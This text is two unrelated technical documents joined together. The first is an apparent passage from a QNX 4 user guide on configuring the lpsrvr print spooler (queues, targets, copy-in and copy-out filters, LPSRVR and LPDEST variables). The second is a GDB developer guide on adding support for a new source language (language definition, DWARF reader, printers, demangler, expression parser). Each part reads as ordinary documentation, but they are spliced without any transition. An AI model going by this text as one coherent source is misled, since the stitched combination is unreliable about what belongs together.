For example, a setup file like this:
[txt] ta=lpt ci=pr -f -h co=txt2ps cp=init_printer [-lpt] dv=/dev/par
would result in the following substitutions:
pr -f -h < $(fname) > $(spfile) txt2ps < $(spfile) | init_printer > /dev/par
Using setup files
Queues and targets
When you create a setup file, you specify each queue by giving it a name and an optional list of parameters; you specify each target by starting its name with a dash (-). To illustrate, here's a very simple setup file:
[txt] ta=lpt [-lpt] dv=/dev/par
In this file we have a queue called txt and a target called lpt. When data is sent to the txt spool queue, the data is saved in a temporary spool file and is known as a "job." When the spooler removes that job from the queue, the job is placed on the target, lpt, which then directs the data to the parallel port, /dev/par.
Filters
It's often necessary to filter spooled data, so lpsrvr provides the copy-in and copy-out mechanisms. As mentioned earlier, copy-in is run before the data is placed on the queue, while copy-out is run after the data is removed from the queue.
Note that if you have many queues feeding a single target and one of the queues has a copy-out filter that may take a long time to run, the target will be temporarily unavailable to the remaining queues if that queue is selected. (For more information, see the "Example setup files" section.)
Using copy-in
A good example of the use of a copy-in filter is to pass the data through pr to paginate it:
[txt] ci=pr -f -h "$(file)" ta=lpt [-lpt] dv=/dev/par
Using copy-out
You might use a copy-out filter, for example, when you have both a PostScript printer and an HP printer. You could have two copy-out filters to generate the proper output format. Let's say you have two programs: txt2ps, which generates PostScript, and txt2hpgl, which generates HPGL:
[ps] ta=lpt1 co=txt2ps [hp] ta=lpt2 co=txt2hpgl [-lpt1] dv=/dev/ser [-lpt2] dv=/dev/par
Chaining queues
Queues can be chained -- this moves the job from queue to queue. The following is a simple example of chaining onto a queue named tmp, which then sends the data to the lpt target:
[txt] qn=tmp [tmp] ta=lpt [-lpt] dv=/dev/par
Accounting information
The af keyword lets you specify a filename that the commands may access as $(af) so they can write any information they want to log.
Input errors
The invoking lp utility will report any errors that occur during the input of data into a queue. If you submit data by directly writing to the spool file in the /dev/spool directory, write errors will occur if something prevents a successful copy into the queue.
Output errors
You can use the ab keyword to specify a command to execute if a target abandons a job. The following would inform the invoking user of the error via a mail message:
ab=echo lpsrvr print job $(jobid), file $(file) failed \ | mailx $(username)
Example setup files
Multiple queues feeding a single target
The following example shows a set of queues that share a common target. The three queues are named:
- txt (ASCII text files)
- ps (PostScript files)
- gif (Graphic Interchange Format files)
The configuration is as follows:
Here's the file to set this up:
# ASCII to PostScript queue: [txt] ta=lpt ci=text2ps pr#50 # direct PostScript queue: [ps] ta=lpt pr#60 # GIF to PostScript queue: [gif] ta=lpt ci=gif2ps pr#5 # target printer: [-lpt] dv=/dev/par
In this example, users send files with the lp utility to the appropriate queue, which converts the file through a copy-in filter (except for the ps queue). The queue then sends the converted data to the target, /dev/par.
Since the hypothetical filter programs text2ps and gif2ps may take a relatively long time to process a job, copy-in filters are used rather than copy-out filters. A copy-out filter will tie up the target, preventing other jobs from being dequeued while the filter is running. The chosen configuration allows other jobs to be sent to the target while the PostScript translation is being generated.
Also, since GIF files tend to be large, they're assigned a lower priority than the others.
Multiple queues feeding three targets
The following example is a further refinement of the above setup, with some additional features required for a larger configuration. There are now three printers, all PostScript, located in different parts of the building (connected to //1/dev/ser1, //2/dev/ser1, and //3/dev/ser1). The configuration looks like this:
Here's the file to set this up:
# ASCII to PostScript queue: [txt] ta=lp1,lp2,lp3 ci=text2ps pr#50 # direct PostScript queue: [ps] ta=lp1,lp2,lp3 pr#60 # GIF to PostScript queue: [gif] ta=lp1,lp2,lp3 ci=gif2ps pr#5 # target printers: [-lp1] dv=//1/dev/ser1 ok=echo file $(fname) sent to $(target) \ | mailx $(username) ab=echo file $(fname) did not get printed \ | mailx $(username) [-lp2] dv=//2/dev/ser1 ok=echo file $(fname) sent to $(target) \ | mailx $(username) ab=echo file $(fname) did not get printed \ | mailx $(username) [-lp3] dv=//3/dev/ser1 ok=echo file $(fname) sent to $(target) \ | mailx $(username) ab=echo file $(fname) did not get printed \ | mailx $(username)
The above configuration uses the same three queues described earlier (txt, ps, and gif) but they now feed three separate targets. The spooler selects the first available target from the set of targets (lp1, lp2, lp3) and sends the data to its corresponding printer.
Queue selection is based on priority first, then on the age of the job.
In this example, a mail message is sent to the submitter indicating whether or not the job completed normally.
Accessing spoolers and queues
Many spoolers may be present on a network; each of these can maintain multiple queues. To communicate with any given spooler, the lp utilities first locate the spooler through the unique global name that the spooler registers (see the "Global keywords" section).
When using any lp utility, you can:
- omit both the spooler and the queue
- specify only the spooler
- specify only the queue
- specify both the spooler and the queue
If you don't specify the spooler on the command line, the utility checks the LPSRVR environment variable, which contains the name of the default spooler. However, if LPSRVR isn't defined, the utility will use the spooler that has registered the default global name /qnx/spooler.
If the utility successfully locates a spooler, but you haven't specified a queue on the command line, the utility will check the LPDEST environment variable, which contains the name of the default queue. However, if LPDEST isn't defined, the utility will use the first queue entry in the setup file of the located spooler.
LPSRVR and LPDEST
The LPSRVR and LPDEST environment variables are used when the command-line information given to the lp utilities doesn't fully specify which spooler or queue to use.
LPSRVR
LPSRVR specifies the default spooler. The following setting of LPSRVR would indicate that the default spooler is the one with the name /qnx/spooler2:
export LPSRVR=/qnx/spooler2
The name specified in LPSRVR must always begin with a leading slash. LPSRVR must never contain the name of a queue.
LPDEST
LPDEST specifies the default queue. You can use LPDEST in two ways. You can specify a queue only:
export LPDEST=waybills
Or you can specify a spooler and a queue:
If you specify a spooler in LPDEST, the LPSRVR variable is ignored, even if it's defined.
Examples
Let's look at a few simple examples that show some of the ways you can specify spoolers and queues. For these examples, let's assume you have two spoolers on the network, each with two queues.
The first spooler uses the default global name, /qnx/spooler; its queues are named txt and ps. The second spooler uses the name /qnx/spooler2; its queues are named checks and waybills.
Naming neither a spooler nor a queue
Let's say you enter the following lp command, specifying neither a spooler nor a queue:
lp test.dat
The utility will first try to locate a spooler by checking LPSRVR. If that variable isn't defined, the utility will locate the spooler with the default global name /qnx/spooler.
The utility will then try to determine the queue by checking LPDEST. If that variable isn't defined, the utility will select the first queue specified in the setup file of the located spooler.
Naming only the spooler
If you specify a string that begins with a leading slash, the string is always assumed to be a spooler name. Thus, if you enter the following command, the utility will treat /qnx/spooler2 as a spooler:
lp -P /qnx/spooler2 test.dat
Because the second spooler uses /qnx/spooler2 as its name, that spooler will be located. The utility will then try to use LPDEST as the default queue. If LPDEST isn't defined, the job is submitted to the queue checks, since that's the first queue in the setup file of /qnx/spooler2.
Naming only the queue
If you specify a string that doesn't begin with a leading slash, the string is always assumed to be a queue name. Thus, if you enter the following command, the utility will treat txt as a queue:
lp -P txt test.dat
The utility will first try to locate a spooler by checking LPSRVR. If that variable isn't defined, the utility will use the first spooler, since that spooler has registered the default global name, /qnx/spooler.
Naming both the spooler and the queue
In the following example, both the spooler and the queue are named. Since the string begins with a leading slash, the utility will initially attempt to find a spooler called /qnx/spooler2/waybills.
lp -P /qnx/spooler2/waybills test.dat
However, since the spooler /qnx/spooler2/waybills doesn't exist, the search will fail, at which point the utility will treat the specified string as a spooler name followed by a queue name. The spooler with the name /qnx/spooler2 will be located, and jobs will be submitted to the waybills queue on that spooler.
Initialization files
You might find it useful to configure several default spoolers, if, for example, your marketing, sales, and R&D departments each has a spooler running:
LPSRVR=/qnx/spooler (marketing)
LPSRVR=/qnx/spooler2 (sales)
LPSRVR=/qnx/spooler3 (R&D)
You normally initialize environment variables beforehand in system initialization files. You may wish to use one of the following files to initialize the variables:
/etc/config/sysinit.node (run at boot time)
/etc/default/login (run at login time)
/etc/profile (run by every login shell).
|
http://www.qnx.com/developers/docs/qnx_4.25_docs/qnx4/user_guide/printspool.html
|
crawl-003
|
refinedweb
| 3,959
| 57.81
|
. What attribute, and supporting browsers will both alert users who don't fill it out and refuse to let them submit the form.
<input type="text" required>
Do you need the response to be a minimum or maximum number of characters? Use
minlength and
maxlength to enforce those rules. This example requires a value to be between 3 and 12 characters in length.
<input type="text" minlength="3" maxlength="12">
The
pattern attribute let's you run regex validations against input values. If you, for example, required passwords to contain at least 1 uppercase character, 1 lowercase character, and 1 number, the browser can validate that for you.
<input type="password" pattern="^(?=.*\d)(?=.*[a-z])(?=.*[A-Z])(?!.*\s).*$" required>
If you provide a
title attribute with the
pattern, the
title value will be included with any error message if the pattern doesn't match.
<input type="password" pattern="^(?=.*\d)(?=.*[a-z])(?=.*[A-Z])(?!.*\s).*$" title="Please include at least 1 uppercase character, 1 lowercase character, and 1 number." required>
You can even combine it with
minlength and (as seems to be the case with banks,
maxlength) to enforce a minimum or maximum length.
<input type="password" minlength="8" pattern="^(?=.*\d)(?=.*[a-z])(?=.*[A-Z])(?!.*\s).*$" title="Please include at least 1 uppercase character, 1 lowercase character, and 1 number." required>
See the Pen Form Validation: Basic Text by Chris Ferdinandi (@cferdinandi) on CodePen.
Validating Numbers
The
number input type only accepts numbers. Browsers will either refuse to accept letters and other characters, or alert users if they use them. Browser support for
input[type="number"] varies, but you can supply a
pattern as a fallback.
<input type="number" pattern="[-+]?[0-9]">
By default, the
number input type allows only whole numbers.
You can allow floats (numbers with decimals) with the
step attribute. This tells the browser what numeric interval to accept. It can be any numeric value (example,
0.1 ), or
any if you want to allow any number.
You should also modify your
pattern to allow decimals.
<input type="number" step="any" pattern="[-+]?[0-9]*[.,]?[0-9]+">
If the numbers should be between a set of values, the browser can validate those with the
min and
max attributes. You should also modify your
pattern to match. For example, if a number has to be between 3 and 42, you would do this:
<input type="number" min="3" max="42" pattern="[3-9]|[1-3][0-9]|4[0-2]">
See the Pen Form Validation: Numbers by Chris Ferdinandi (@cferdinandi) on CodePen.
Validating Email Addresses and URLs
The
number input.
<input type="email"))*$">
One "gotcha" with the the
If you want to require a TLD (and you likely do), you can modify the
pattern to force a domain extension like so:
<input type="email" title="The domain portion of the email address is invalid (the portion after the @)."))*(\.\w{2,})+$">
Similarly, the
url input.
<input type="url"]+)*)(?::\d{2,})?(?:[\/?#]\S*)?$">
Like the
url does not require a TLD. If you don't want to allow for localhost URLs, you can update the pattern to check for a TLD, like this.
<input type="url" title="The URL is a missing a TLD (for example, .com)."]+)*(?:\.(?:[a-zA-Z\u00a1-\uffff]{2,}))\.?)(?::\d{2,})?(?:[/?#]\S*)?$">
See the Pen Form Validation: Email & URLs by Chris Ferdinandi (@cferdinandi) on CodeP
pattern to catch browsers that don't support it.
The
date input type is for standard day/month/year dates.
<input type="date" pattern="(?:19|20)[0-9]{2}-(?:(?:0[1-9]|1[0-2])-(?:0[1-9]|1[0-9]|2[0-9])|(?:(?!02)(?:0[1-9]|1[0-2])-(?:30))|(?:(?:0[13578]|1[02])-31))">
In supporting browsers, the selected date is displayed like this:
MM/DD/YYYY (caveat: in the US. This can vary for users in other countries or who have modified their date settings). But the
value.
See the Pen Form Validation: Dates by Chris Ferdinandi (@cferdinandi) on CodePen. input type.
<label for="date">Date <span class="description-date">YYYY-MM-DDD</span></label> <input type="date" id="date" pattern="(?:19|20)[0-9]{2}-(?:(?:0[1-9]|1[0-2])-(?:0[1-9]|1[0-9]|2[0-9])|(?:(?!02)(?:0[1-9]|1[0-2])-(?:30))|(?:(?:0[13578]|1[02])-31))"> <script> var isDateSupported = function () { var input = document.createElement('input'); var value = 'a'; input.setAttribute('type', 'date'); input.setAttribute('value', value); return (input.value !== value); }; if (isDateSupported()) { document.documentElement.className += ' supports-date'; } </scipt> <style> .supports-date .description-date { display: none; } </style>
See the Pen Form Validation: Dates with a Feature Test by Chris Ferdinandi (@cferdinandi) on CodePen.
Other Date Types
The
time input type let's visitors select a time, while the
month input type let's them choose from a month/year picker. Once again, we'll include a pattern for non-supporting browsers.
<input type="time" pattern="(0[0-9]|1[0-9]|2[0-3])(:[0-5][0-9])"> <input type="month" pattern="(?:19|20)[0-9]{2}-(?:(?:0[1-9]|1[0-2]))">
The
time input displays time in 12-hour am/pm format, but the
value is 24-hour military time. The
month input is displayed as
May 2017 in supporting browsers, but the value is in
YYYY-MM format.
Just like with
input[type="date"], you should provide a pattern description that's hidden in supporting browsers.
See the Pen Form Validation: Add `novalidate` programatically by Chris Ferdinandi (@cferdinandi) on CodePen.
This seems super easy. What's the catch?
While the Constraint Validation API is easy and light-weight, it does have some drawbacks.
You can style fields that have errors on them with the
:invalid pseudo
|
https://css-tricks.com/form-validation-part-1-constraint-validation-html/
|
CC-MAIN-2019-09
|
refinedweb
| 946
| 58.99
|
Control Ui in Scene?
- DoinStuffMobile
Hello everyone!
I was wondering if it is possible to put a joystick-like control on a game in scene (think like on a mobile rpg game)?
I have tried different combinations of touch_began and moved but the three things i am looking for are:
Character moves in direction the touch is dragged from initial touch, but not to the location of touch
For this to only happen on one side of the screen (example : only on the left side)
Is possible to have an overlay that includes a joystick on the left and buttons on the right, for example. I can provide pictures if i haven't described this well enough.
Thank you for any guidance or links to where to look. I've only looked at the Scene and Turtle documentation and tinkered around.
If this is not possible I also was wondering if Pythonista's Turtle module would be getting keyboard inputs back since the popularity of bluetooth, smart, and magic keyboards? I think it currently doesnt include them, right? 😅
Thanks again! I haven't ever made a thread before, but I've learned a lot from reading others.
DoinStuff
@DoinStuffMobile, all of your goals are feasible and nothing too exotic.
The trick to handling touches on different sides of the screen in Scene is to use
touch_idproperty of a touch to differentiate between them, and of course the location to see which side of the screen the touch starts in.
Connecting external keyboard keypresses to turtle logic seems easy as well, but I have done nothing with physical keyboards and Pythonista.
@DoinStuffMobile, here’s a very simple example of touches on different sides of the screen controlling different things:
from scene import * import math class MyScene (Scene): def setup(self): l = self.left_ship = SpriteNode('spc:PlayerShip1Orange') l.position = (self.size.width / 4, self.size.height / 2) l.rotation = -math.pi / 2 self.add_child(l) r = self.right_ship = SpriteNode('spc:PlayerShip3Blue') r.position = (self.size.width / 4*3, self.size.height / 2) r.rotation = math.pi / 2 self.add_child(r) self.left_touch = self.right_touch = None def touch_began(self, t): on_left = t.location.x < self.size.width / 2 if on_left and self.left_touch is None: self.left_touch = t.touch_id elif not on_left and self.right_touch is None: self.right_touch = t.touch_id def touch_moved(self, t): touch = t.touch_id if not touch in (self.left_touch, self.right_touch): return delta_y = t.location.y - t.prev_location.y if touch == self.left_touch: ship = self.left_ship elif touch == self.right_touch: ship = self.right_ship x, y = ship.position ship.position = x, y + delta_y def touch_ended(self, t): touch = t.touch_id if touch == self.left_touch: self.left_touch = None elif touch == self.right_touch: self.right_touch = None run(MyScene())
|
https://forum.omz-software.com/topic/6417/control-ui-in-scene
|
CC-MAIN-2022-27
|
refinedweb
| 457
| 61.53
|
ZaelMember
Content count91
Joined
Last visited
Community Reputation154 Neutral
About Zael
- RankMember
Android Image Loading
Zael replied to styuR's topic in For BeginnersIs there any reason you are loading them from assets instead of resources? As I recall loading them from resources is slightly easier.
Need some help and advice for creating my first game
Zael replied to ghostman72's topic in For BeginnersThis has been posted many times before. In short though: C# and XNA are good for a beginner. You should probably be prepared to make your first several programs (games) text based stuff to get a feel for program flow and the art of programming. [url=""]Visual Studio Express edition[/url] is free from Microsoft's website. I don't actually do much C# myself, so I can't really help as far as tutorials go. Good luck!
- I will see if I can take a moment to look at it more in-depth over the next few evening, but right off the bat, you can make it a lot cleaner if you look at using functions. Functions help you abstract different procedures and not only easily re-use code, but also make the code itself more readable. In case you haven't encountered them before I have included a small example. [CODE] #include <iostream> using namespace std; int sumOfRange(int a, int b); int main() { int a, b; cout << "Provide first number: "; cin >> a; cout << "Provide second number: "; cin >> b; cout << "The sum of all numbers between " << a << " and " << b << " is: " << sumOfRange(a, b) << endl; int c,d; cout << "Provide first number: "; cin >> c; cout << "Provide second number: "; cin >> d; cout << "The sum of all numbers between " << c << " and " << d << " is: " << sumOfRange(c, d) << endl; } int sumOfRange(int a, int b) { int total = 0; for(int i = a; i <= b; i++) { total+=i; } return total; } [/CODE] The first thing I do is declare the function on line 5. All functions must be declared before using. A function is comprised of really three parts. The first is the return type. In this case the function returns an int. The second is the name of the function. This is how the function is called. The last thing is a list of parameters. I believe there is an upper limit on the number of parameters a function can have, but I have never hit that limit (it is pretty high). Each parameter is essentially a variable that is declared just like you would inside a function except that it is a copy of the whatever value was passed to the function. The next thing I do is define and declare my main function. Inside my main function I use the the function I declared on line 5. Finally after my main function I define my function. The function definition is essentially the code that is executed when the code is used. A minor, but essential thing to understand is that because parameters are copies, if you change the value of a parameter in a function the variable used when calling the function is unchanged. [CODE] #include <iostream> using namespace std; void functionThatDoesNothing(int a) { a = 10; } int main() { int a = 5; cout << "The variable 'a' is: "<< a << endl; functionThatDoesNothing(a); cout << "The variable 'a' is still "<< a << endl; return 0; } [/CODE] You can see from this example that the function does not change a. I have also shown that you can define the function at the same time you declare it. It is usually best to define and declare the function separately if you have more than one file (declarations go in the .h or .hpp file and definitions go in the .cpp file). If you want to have the parameter directly affect the variable that was used when calling the function you can use what is called "pass by reference". Whether a function parameter is "pass by value" or "pass by reference" depends on the way it is declared in the function declaration. To make a variable "pass by reference" you simply place an '&' character before the variable name. Below I will demonstrate the same code as above, except with "pass by reference". [CODE] #include <iostream> using namespace std; void functionThatDoesSomething(int & a) { a = 10; } int main() { int a = 5; cout << "The variable 'a' is: "<< a << endl; functionThatDoesSomething(a); cout << "The variable 'a' is now "<< a << endl; return 0; } [/CODE] "Pass by reference" can get a little bit dangerous (your code will crash) if you use it in certain ways (like for the return type of a function), but for the way I have demonstrated above it should be safe in most if not all situations. P.S. Classes and Structs can also make code a lot cleaner and more readable, but I think learning to write your own functions first is a nice step in the right direction.
- Didn't mean to insult you. You would be surprised at some of the simple things people will ask how to do. In a cmd window I am not aware of any mouse functions (could be wrong), so you may still need to do a simple menu like that when the user makes choices. Of course maybe you are more creative than I. Ideally you would use a system library that reads each key as it is pressed (instead of waiting for the user to hit the enter key). Most text based games I have played use a method like that with certain keys toggling a menu.
- Typically in a text based game a menu will be simple output with different input option. Example "Menu": [CODE] int choice = 0; while(choice != 2) { std::cout << "What would you like to do?\n"; std::cout << "1) Start a new game\n"; std::cout << "2) Quit\n"; cin >> choice; switch (choice) { case 1: startGame(); break; case 2: return; break: } } [/CODE] Does that make sense or are you asking something else?
C++ Exercise
Zael replied to Kheyas's topic in For BeginnersCheck out [url=""]Project Euler[/url]. It is basically exactly what you have described.
- Like crancran said, 1 and 3 will vary based on previous experience and just how quickly you learn things. I think 2 is a little bit more definable, but I think it is more about making sure you know the content of said lessons than the actual number of lessons you go through. I personally think you should feel comfortable with the everything up to and including Object Oriented Programming before starting a 2D game (from the tutorial series at [url=""][/url]). I would start trying a simple text based adventure game (kind of like the you-choose-the-ending type books) by the time you get through Control Structures. Depending on the simplicity of the game and the 2D library you choose to work with, you could conceivable start writing a 2D game at that time as well, but I wouldn't recommend it yet. Also, even though they are not really called out in that tutorial series I would strongly recommend looking at and learning how to use std::vector and std::string as soon as possible. While it is good to know about raw arrays and character sequences they can lead to a lot of bugs that are easily avoided by using the string and vector classes. As for 4, I started my first full-time job as a software developer last year at about this time. I still love programming, and still spend a lot of my evenings working on personal programming projects (most of them game related). I still hope to break into the game industry someday (probably as an indie), but I have to pay off my student loans first. For me programming has always been a creative outlet. I can literally create worlds with whatever rules I set for them, and then see them on my computer screen. Nothing else I know has ever let me do anything like it. 5) I don't quite understand question 5 to be honest. P.S. SDL requires the use of pointers. I have never used SFML, but if it doesn't require the use of Pointers then you could probably create a simple Snake clone by the time you have finished Control Structures. I would still recommend getting classes and inheritance down. They make your code much more managable.
Need Help : SDL_FreeSurface doesn't work?
Zael replied to pandaraf's topic in For BeginnersLooks to me like the problem is that you are simply repainting the time without repainting the background first. Think of the surface as an actual canvas for a second. You have a picture on the there. Then you create a picture of the time. Next you paint that time picture onto your canvas surface. Before restarting the loop, you free the time picture (this doesn't affect the canvas image which still has the time already painted onto it). Then you get the new time, and paint the new time onto the surface (over the old time, but without removing the old time). If you want to erase the previous surface, what you really need to do is at the beginning of each loop re-apply the background (thus painting over the old time). SDL_FreeSurface frees the image from memory, but it doesn't erase the image from other surfaces on which it has already been "painted". Does that make sense?
- Don't be scared. I started when I was just two years younger than you, except I started with Quick Basic. I am very impressed that you trying C++ at such a young age. Some pretty basic tutorials are available at: [url=""][/url] and [url=""][/url]. The important thing with programming is not just learning the syntax (language) but also getting into a logical mindset and developing your ability to think through a problem. I strongly recommend trying some of the problems from [url=""][/url] to build up your ability to think through problems as you start to understand the language. Depending on where you are in Math (Algebra or Pre-Algebra?) you should be able to do some of the easier problems without too much difficulty. Feel free to PM me (or just post) any questions, and I will try to answer them. At one point I started writing an Intro to C++ book aimed directly at your age group; however, life has taken over, and to be I honest I enjoy programming more than writing about it.
the very first questions of a beginner of non beginner
Zael replied to rocketon's topic in For BeginnersHow have you made your current games? Has the view to gamedev (this website or game development?) changed since ... 1990? 2000? last year? There are 10s if not 100s of ways to start making games ranging from GameMaker to Unity and from HTML5/Javascript to C++ with DirectX. It depends little bit on how much you want done for you and how custom your game needs to be. If you provide a little bit of background we may be able to provide more in-depth answers.
VB.Net NPC Problem
Zael replied to Simoxeh's topic in For BeginnersYour logic listed sounds fine to me at a high level. Perhaps you could be more specific with what you are looking for? What logic do you feel you are currently missing that you need? I don't think many people on this forum use VB, so we probably can't help too much with VB classes and libraries. It seems to me like you might want some sort of logic for determining if the price is too high (go to another store), or if the quality of the products aren't good (go to another store). Aside from that I might look at path-finding algorithms to go to the products (if you are doing a 2D game instead of just text based).
How do I calculate if I should be adding or subtracting rotation?
Zael replied to Tom 'Rossy' Rosbotham's topic in For BeginnersIt should work for crossing the Y-axis just as well. I will attempt an English translation of the algorithm. First, get the direction of rotation to go to the current target. Then, create a second target. This second target is the same as the actual target but offset by 2 PI. If the target is less than 0 then add 2 PI to it to create the second target; otherwise, subtract 2 PI. If for example we have a target of 1 radians, we now have targets of 1 and -5.28319 radians. Next, we identify which one is closer to the currentRotation. If it is our second target (-5.28319 radians in the example) then we change the direction. Let's assume the currentRadians are -3.1. The second target is closer so our direction should now be -1. Now we take the currentRotation and add the movingRotationSpeed times the direction. This will get things rotating in the correct direction. The next bit is bookkeeping. If the currentRadians are greater than PI we want to reduce it by 2 PI. This keeps it in the same position but keeps the value between -PI and PI. We do the same test to check if currentRadians are less than -PI and if so, increase the value by 2 PI. The final bit is because we are dealing with floats. When dealing with floats it is extremely unlikely that we will get an exact match. So once our currentRotation is within the movingRotationSpeed of the target we simply set it equal to the target. Example: currentRotation = -2.9 targetRotation = 2.5 movingRotationSpeed = .1 First we check the direction. Since targetRotation minus currentRotation is greater than zero we set the direction to 1. direction = 1 Now we create the secondTarget. Because the targetRotation is greater than 0, our secondTarget will be targetRotation minus 2 PI. secondTarget = -3.78318531 We can see that our currentRotation is closer to our secondTarget, so we change direction. direction = -1 Now we move my movementDirection*direction. currentRotation = -3.0 (iteration 1) currentRotation = -3.1 (iteration 2) currentRotation = -3.2 (iteration 3) On iteration 3 the currentRotation becomes less than negative PI, so we add 2 PI to the result. currentRotation = 3.08318531 On iteration 4 we find that the currentRotation is greater than targetRotation, so our initial direction is -1. We also find that targetRotation is now closer than our secondTarget, so our direction stays at -1 from here on out. direction = -1 We continue iterating. currentRotation = 2.98318531 (iteration 4) currentRotation = 2.88318531 (iteration 5) currentRotation = 2.78318531 (iteration 6) currentRotation = 2.68318531 (iteration 7) currentRotation = 2.58318531 (iteration 8) On iteration 8 we find that we are within the movingRotationSpeed of our target, so we simply set the currentRotation equal to the targetRotation. currentRotation = 2.5 Does that help/make sense? P.S. Looks like SimonForsman's code does essentially the same thing in a little bit different order. P.S.S. An if statement is actually more correct because the while loop should essentially be replaced with the game loop. Your condition should be if the angles are not equal do the code that I have in the loop.
How do I calculate if I should be adding or subtracting rotation?
Zael replied to Tom 'Rossy' Rosbotham's topic in For BeginnersWhat that line says is if the targetRotation is less than 0 set the otherTargetRotation to targetRotation + 2PI; otherwise, set it to targetRotation-2PI. Here is complete working code with the missing bits filled in. This has been tested and works. [CODE] #include <iostream> #include <cmath> using namespace std; #define PI 3.14159265 int main() { cout << "Current Rotation?\n"; float currentRotation; cin >> currentRotation; cout << "Target Rotation?\n"; float targetRotation; cin >> targetRotation; while(currentRotation != targetRotation) //rotate { int direction = targetRotation - currentRotation > 0 ? 1 : -1; float otherTargetRotation = targetRotation < 0 ? targetRotation + 2*PI : targetRotation - 2*PI; cout << "Target: " << targetRotation << endl; cout << "Other: " << otherTargetRotation << endl; char c; cin >> c;; cout << "Current Rotation: " << currentRotation << endl; } } [/CODE] You will obviously want to set your own thresh hold and velocity, and remove the input/output statements. EDIT: Some of my code was cut-off in my copy-paste. It should now be fixed.
2D game library for simulating thousand small moving objects (with collision detection)
Zael replied to -Aurora-'s topic in For BeginnersSounds to me like your bottleneck is collision detection (though I don't know how Clanlib does graphics). Might be best to try a physics engine like Box2D for collision detection. Testing each object against every other object adds up very, very quickly. sum(1:n-1) quickly. So at 80 objects you are testing 3160 collisions every frame. A physics engine (like Box2D) should be able to split your space into regions so that cells only check against other cells in the same region. Assuming for a moment that your 80 cells are evenly split into 4 regions, that already reduces your collision checks per frame to 760.
Angular movement in SDL
Zael replied to AlanSmithee's topic in General and Gameplay ProgrammingI have to ask why not just use vector math? [CODE] float unitVectorX = b.x-c.x; float unitVectorY = b.y-c.y; float distance = sqrt(unitVectorX*unitVectorX + unitVectorY*unitVectorY); unitVectorX /= distance; //results in amount of x to travel per unit unitVectorY /= distance; //result in amount of y to travel per unit c.x += unitVectorX*velocity; c.y += unitVectorY*velocity; [/CODE] Maybe just my opinion, but I find it far simpler to think about. I could be wrong, but I also believe it is significantly faster than having to use the trig functions.
|
https://www.gamedev.net/profile/135035-zael/?tab=posts
|
CC-MAIN-2018-05
|
refinedweb
| 2,952
| 62.78
|
Adding a Source Language to GDB
This page is a high-level guide to adding support for a new source language to GDB. This is not too difficult, and one nice thing is that you can do the work in pieces, gradually adding more functionality.
Language definition
The first step is to add an entry for the new language to enum language in gdb/defs.h.
Next, make a new instance of struct language_defn (see gdb/language.h). The best approach is to make a new "lang.c" file, named after your language (e.g., ada-lang.c, c-lang.c); and then to start the new language definition as a copy of the C definition, replacing only the first three elements (la_name, la_natural_name, and la_language). Then you will refine the definition as you write more components.
Add an initialization function to your "lang.c" file to register the new language definition with add_language.
Edit init_filename_language_table in gdb/symfile.c to add any language extensions that should be associated with your new language.
At this point, you should be able to start gdb and use set language to change to your new language.
Update the DWARF reader
Because most GDB targets use DWARF, this task should be considered an early must-do. Change dwarf2read.c:set_cu_language to translate the DWARF code for your language to the enum value you added in the previous step. You may need to edit include/dwarf2.h (which is canonically maintained in GCC) to add the new value. If your language doesn't have a language code yet, you can add DWARF producer sniffing in read_file_scope.
You may want to update the DWARF reader some more in a later step.
Next steps
There are many choices of what to do next. Many of them can be done in any order. This guide presents one possible sequence, leaving the most difficult tasks for last. Most of the remaining tasks involve implementing one or more methods from struct language_defn.
There are also some tasks that you may or may not have to do, depending on your language. These are covered in the very last section.
Correct scalar fields
struct language_defn has several scalar fields -- as opposed to function pointers, or pointers to other tables. Go through each of these and make sure that the value in your new definition is correct for the language you are implementing.
Add a character printer
Implement the la_printchar and la_emitchar methods.
Add a typedef printer
Implement the la_print_typedef method.
Add a type printer
Implement the la_print_type method. Ideally (for your users), this should be able to display any type that would be used in programs written in the new language. Because programs can be written in multiple languages, and because GDB doesn't record the language of a type, if your printer sees a type it doesn't recognize, it is usually best to delegate it to c_print_type.
Add a val printer
Value printing is split into two phases -- value printing, which tries to print a struct value, and "val" printing, which essentially tries to print a value that has been decomposed into its constituent parts. Normally the generic value printer is fine; and so you will probably only need to implement a val printer.
Many values can be printed nicely using generic_val_print. It can be customized to some degree using an instance of generic_val_print_decorations. However, the generic printer cannot handle all types, for example TYPE_CODE_STRUCT. Your printer should handle these.
There are a number of print options that your printer should handle, in order to integrate nicely into GDB. See struct value_print_options, and the manual, for details.
One question you should consider is which types should have special code in the val printer. One decent approach is to have GDB know how to print values that correspond to types that are specially treated (or known) by the compiler. Then, delegate the printing of other types to Python pretty-printers that are shipped with the standard library.
Implement symbol lookup
The language method la_lookup_symbol_nonlocal is used by GDB when searching for a name. In particular, GDB calls this method after searching the various function-local blocks (and after searching this, if you've defined la_name_of_this), and before searching file-scoped and global blocks. This provides a way for your language to handle more complex name lookup, such as searching any associated namespaces or module imports.
Write the documentation
Your language should have a node in the manual, near the other source language nodes. You should also write a NEWS entry.
Write tests
Porting the test suite can be difficult, depending on the specifics of your language. See gdb/testsuite/lib/future.exp for a good spot to add hooks for your language.
It's a good idea to run coverage tests while writing your test suite, to ensure your new code is sufficiently tested.
Add a demangler
If your language mangles symbol names, say to include type information, then you will want to teach GDB how to demangle these names. This has a few steps:
1. The demangler implementation itself should go in libiberty, alongside the other demanglers there. The demangler test suite is also here.
2. You should update c++filt to recognize the name of the newly-added demangling style as an argument to the --format flag.
3. Update the la_demangle field in your language definition to call the new demangler.
4. Update gdb/symtab.c:symbol_find_demangled_name to handle your language.
Create the expression parser
If you use a yacc-based parser, it should reside in a file named after your language, and ending in "-exp.y". Since we can't depend upon everyone having Bison, and yacc produces parsers that define a bunch of global names, GDB provides a header file, yy-remap.h, which can be used to rename symbols that might possibly conflict.
Routines for building parsed expressions into a union exp_element list are in parse.c.
Due to the way the GDB CLI works, expression parsers must follow a few rules in addition to those required by the source language:
If the global comma_terminates is non-zero, then a top-level (i.e., unparenthesized) comma should be treated as an EOF. This is used for commands like printf.
The word if should be treated as EOF. This lets watch EXPR if OTHER-EXPR and break *EXPR if OTHER-EXPR work.
The words task and thread, or any abbreviation of them, should be treated as EOF if followed by an integer. So, for example task + 7 is part of an ordinary expression but task 98 should be considered to end the expression. This is also used by breakpoints.
It should be possible to start a variable with $ so that convenience variables and the value history can be accessed.
Other GDB expression extensions, such as the @ operator, can be supported if you like, and if they make sense for your language. There are a number of these of varying degrees of obscurity.
